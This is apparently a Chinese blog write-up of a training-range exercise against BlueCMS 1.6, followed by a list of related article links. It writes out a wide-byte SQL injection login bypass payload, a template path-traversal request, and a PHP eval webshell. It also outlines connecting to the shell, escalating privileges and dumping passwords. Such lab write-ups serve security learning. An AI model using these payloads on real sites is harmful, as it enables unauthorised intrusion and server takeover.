封神台之萌新也能找CMS漏洞整理记录
封神台之萌新也能找CMS漏洞整理记录
- 工具
- 信息收集
- 通过后台直接获取SHELL
- 使用终端shell
工具
御剑后台扫描工具 ,BurpSuite, 菜刀、蚁剑
信息收集
靶场地址
后台地址
先扫下敏感目录,这是后面才找来的工具,不然时间省下不少,后台是自己猜的,在模版文件路径那里白搞了半天(菜~):
很明显,本站用的是CMS模版,版本:BlueCMS 1.6 ,页脚有显示:
然后网上查相关漏洞,存在SQL注入,这里就不说了,很多。查找过程中发现一个有意思的东西,后台登陆存在宽字节注入,无需账号密码即可登陆后台???
参考下:BlueCMS v1.6 sp1 /admin/login.php SQL注入漏洞分析
进入后台登陆页面
使用任意账号密码登陆抓包,因为不填的话会报错:
- 抓包修改
admin_name
=%df%27+or+1%3D1%23
- 明文就是
%df' or 1=1#
- 单引号被转义后变成
%df\' or 1=1#
- 宽字节注入是利用mysql的一个特性,因为gbk是多字节编码,他认为两个字节代表一个汉字,所以
%df
和后面的\
也就是%5c
变成了一个汉字“運
”,而单引号逃逸了出来,就可以成功闭合sql语句了 - 再加上后面的
or 1=1 #
就构造成了永真语句,可以成功免密登录管理员后台了。
关掉BURP代理,重新刷新后台页面即可成功登陆:
通过后台直接获取SHELL
模版修改处存在越级访问漏洞!当然查到的(万能的网友~)
随意选一个点编辑,打开开发者工具F12,找到内嵌表单地址在新窗口打开
打开后再选一个编辑
然后修改地址
跳到上层目录tpl_name=../../ann.php
并修改模版文件写入PHP一句话木马 <?php @eval($_POST["cmd"]);echo "写入一句话成功!"?>
echo部分只是用来验证是否写入成功,因为是测试,正常渗透应该删除,点击下方提交
回到首页更新缓存!
打开木马文件看一下,写入成功
接下来上菜刀或者蚁剑
连接成功!
使用终端shell
使用whoami看了一下,权限是system,这是因为上一章靶场获取的权限,正常来说,这里应该是普通用户权限,连使用whoami的权限都没有,这里需要提权,至于工具,已经有人上传到服务器了,就在D盘的RECYCLER文件夹下,具体的就不多说了,使用第五章的提权可以创建一个管理员账号远程登陆服务器,再然后呢,可以通过第六章使用一个工具来获取管理员的明文密码,只是到目前为止,我都不知道有没有flag,但是靶场上有且仅有一个人提交了flag,这就很难受了,服务器都拿下了,也没办法。
如果谁有flag麻烦告知一声~谢谢!
封神台之萌新也能找CMS漏洞整理记录相关推荐
- 给应届毕业生的建议:萌新程序员找工作的三板斧
一.找工作的目标和方向 一位亲戚家的年轻人马上要从大学毕业了,学软件工程,参加过培训的普通新手程序员,不是TOP学校也不是高学历,于是找我这十几年的老程序员给点建议. 说来惭愧,自己当年也不过是对计算 ...
- 萌新程序员找工作该怎么写简历?
金三银四招聘季,萌新怎么写简历? 作者 | Elaine Bennett 译者 | 弯月,责编 | 唐小引 头图 | CSDN 下载自东方 IC 出品 | CSDN(ID:CSDNnews) 以下为译 ...
- 封神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】
尤里的复仇Ⅰ 小芳![8题] 第一章:为了女神小芳! 第二章:遇到阻难!绕过WAF过滤! 第三章:为了更多的权限!留言板! 第四章:进击!拿到Web最高权限! 第五章:SYSTEM!POWER! 第六 ...
- 封神台-掌控者新靶场 - Kali系列4题
封神台新靶场 - Kali系列[4题] 文章目录 封神台新靶场 - Kali系列[4题] Kali渗透 - Sqlmap实操靶场 Kali渗透 - 拿下目标服务器 Kali渗透 - 通过Sqlmap直 ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
[封神台 - 掌控安全靶场]尤里的复仇 小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练 一.判断是否存在sql注入漏洞 二.判断字段数 三.判断回显点 四.正式注入 五.sql自动化注入 ...
- 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
封神台 https://hack.zkaq.cn 一.1.通过修改Cookie登录后台(没用重打) 2,上传SHELL!3,Flag在网站根目录(flag.php) 3 ...
- 萌新养成 | AI科技大本营实习生招募计划
金三银四跳槽季 这个时候需要做好准备的可不仅仅只有在职或者离职的萝卜 尚未毕业的萌新也需要提早做准备了 毕竟把自己修炼成一个优秀的萝卜也不是一件容易的事 所以,放下你找对象.刷副本.世界游的想法 加入 ...
- 机器学习萌新必学的 Top10 算法
点击上方"Datawhale",选择"星标"公众号 价值内容第一时间获取 来源: 量子位 在机器学习领域里,不存在一种万能的算法可以完美解决所有问题,尤其是像预 ...
- 超强NLP思维导图,知识点全面覆盖:从基础概念到最佳模型,萌新成长必备资源...
栗子 发自 凹非寺 量子位 报道 | 公众号 QbitAI 一只萌新,想把自己修炼成一个成熟的NLP研究人员,要经过一条怎样的路? 有个名叫Tae-Hwan Jung的韩国小伙伴,做了一份完整的思维导 ...
最新文章
- leetcode—Valid Parentheses
- openssl 加密解密 指令_OpenSSL未来架构设计,3.0初步实现
- 通过Kubernetes安全高效管理边缘节点,ACK@Edge年度重磅发布
- python3写冒泡排序_使用python3实现冒泡排序、选择排序和快速排序
- 永磁直驱风力发电机结构图_风机越来越大,国内首台10兆瓦海上风力发电机研制成功...
- ssh图片上传 java_ssh上传并显示图片
- CUBRID学习笔记 22 插入数据
- %3c dd%3e html,index.html
- GaussDB数据dump实现完全同步
- java 百度地图 经纬度_Java百度地图经纬度纠偏
- StringBuilder类的作用,以及与String类的相互转换
- 两路共享LSTM时序数据预测实战+界面可视化应用
- clodop控件使用
- win7+VS2008安装QT、环境配置以及简单实例演示
- android 有序map,给HashMap排序,使之成为有序Map
- Matlab线性规划实例
- 51单片机入门教程(2)——流水灯的实现
- BZOJ3709 Bohater 贪心
- 扔掉你 Windows 操作系统中的盗版软件吧
- 2018-4-30-win2d-CanvasRenderTarget-vs-CanvasBitmap
热门文章
- Crowd Control
- centos7自动获取ip命令_突然断网?专业分析宽带拨号和自动获取ip哪个好?
- 解决java.lang.SecurityException: Permission Denial: ... with revoked permission异常的问题
- 复利青年编程记:又要从零开始一个领域
- 浏览器乱码的原因是什么?如何解决?
- 融资、量产和一栈式布局,这家Tier 1如此备战高阶智驾决赛圈
- 使用HTML(Web)开发iOS/iPhone/iPad应用
- U盘安装ubuntu20.04 Linux系统分区方案 Invalid Partition Table
- 管理者应该会讲的68个超级经典小故事
- 笔记本电脑键盘按键有两个功能,如何切换